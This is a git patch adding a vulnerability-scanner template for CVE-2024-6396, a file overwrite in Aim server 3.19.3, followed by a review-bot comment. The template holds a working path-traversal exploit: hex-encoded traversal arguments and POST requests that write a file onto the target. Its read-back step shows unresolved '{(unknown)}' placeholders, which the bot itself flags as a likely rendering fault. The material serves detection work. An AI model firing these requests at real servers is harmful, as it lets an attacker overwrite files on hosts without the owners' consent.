From 0ae7c00cb1e43e29549186acaaf7240bda129bc0 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Sat, 27 Jul 2024 12:02:50 +0530
Subject: [PATCH 1/2] Create CVE-2024-6396.yaml
---
 http/cves/2024/CVE-2024-6396.yaml | 68 +++++++++++++++++++++++++++++++
 1 file changed, 68 insertions(+)
 create mode 100644 http/cves/2024/CVE-2024-6396.yaml
diff --git a/http/cves/2024/CVE-2024-6396.yaml b/http/cves/2024/CVE-2024-6396.yaml
new file mode 100644
index 0000000000..7aa6b0e935
--- /dev/null
+++ b/http/cves/2024/CVE-2024-6396.yaml
@@ -0,0 +1,68 @@
+id: CVE-2024-6396
+
+info:
+ name: Aimhubio Aim Server 3.19.3 - Arbitrary File Overwrite
+ author: iamnoooob,rootxharsh,pdresearch
+ severity: critical
+ description: |
+ A vulnerability in the `_backup_run` function in aimhubio/aim version 3.19.3 allows remote attackers to overwrite any file on the host server and exfiltrate arbitrary data. The vulnerability arises due to improper handling of the `run_hash` and `repo.path` parameters, which can be manipulated to create and write to arbitrary file paths. This can lead to denial of service by overwriting critical system files, loss of private data, and potential remote code execution.
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2024-6396
+ cwe-id: CWE-29
+ metadata:
+ max-request: 3
+ verified: true
+ fofa-query: icon_hash="-1047157256"
+ tags: cve,cve2024,aim,aimhubio,file-write
+
+variables:
+ filename: "{{rand_base(7)}}"
+ args: "{{ concat(hex_decode('000000000001000000060a000000fe0000000000000000fe004b000000042e2e2f2e2e2f2e2e2f2e2e2f7573722f6c6f63616c2f6c69622f707974686f6e332e392f736974652d7061636b616765732f61696d5f75692f6275696c642f'),filename, hex_decode('2e747874')) }}"
+
+http:
+ - raw:
+ - |
+ POST /tracking/client_1/get-resource HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/json
+
+ {
+ "resource_handler": "my_resource",
+ "resource_type": "Repo",
+ "args": "AAAAAAABAAAABw=="
+ }
+
+ - |
+ POST /tracking/client_1/read-instruction HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/json
+
+ {
+ "resource_handler": "my_resource",
+ "method_name": "_backup_run",
+ "args": "{{base64(args)}}"
+ }
+
+ - |
+ @Host: http://{{Host}}:43800
+ GET /static-files/{(unknown)}.txt HTTP/1.1
+ Host: {{Host}}:43800
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body_1
+ words:
+ - '{"handler":"my_resource"}'
+
+ - type: word
+ part: body_3
+ words:
+ - "{(unknown)}.txt"
+
+ - type: word
+ part: header_3
+ words:
+ - "text/plain"
From c43559d775f0428b7a16b9dc7658465c4cf5fdc7 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Sat, 27 Jul 2024 12:23:48 +0530
Subject: [PATCH 2/2] Update CVE-2024-6396.yaml
---
 http/cves/2024/CVE-2024-6396.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/http/cves/2024/CVE-2024-6396.yaml b/http/cves/2024/CVE-2024-6396.yaml
index 7aa6b0e935..34ca5ffad5 100644
--- a/http/cves/2024/CVE-2024-6396.yaml
+++ b/http/cves/2024/CVE-2024-6396.yaml
@@ -1,7 +1,7 @@
 id: CVE-2024-6396
 info:
- name: Aimhubio Aim Server 3.19.3 - Arbitrary File Overwrite
+ name: Aimhubio Aim Server 3.19.3 - Arbitrary File Overwrite
 author: iamnoooob,rootxharsh,pdresearch
 severity: critical
 description: |
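Review bot: The third request's path `GET /static-files/{(unknown)}.txt` and the `body_3` matcher `"{(unknown)}.txt"` do not reference the `filename` variable declared under `variables:`, so as rendered here the read-back request and the name of the file written by the second request never coincide; this looks like a rendering artifact of `{{filename}}`, but it is worth confirming against the committed file. The template also leaves an artifact on the scanned host: the `_backup_run` call in request two writes `<filename>.txt` under the decoded `../../../../usr/local/lib/python3.9/site-packages/aim_ui/build/` prefix and no request removes it, so consider adding `intrusive` next to `file-write` in `tags` and stating in `description` that a positive result means a file was created on the target. Because that prefix is hard-coded, a miss only shows the default install layout is absent rather than that the host is patched; a comment above `args:` such as `# assumes the default /usr/local/lib/python3.9/site-packages install path; a non-match is not evidence of a fix` would keep operators from reading a negative as clean.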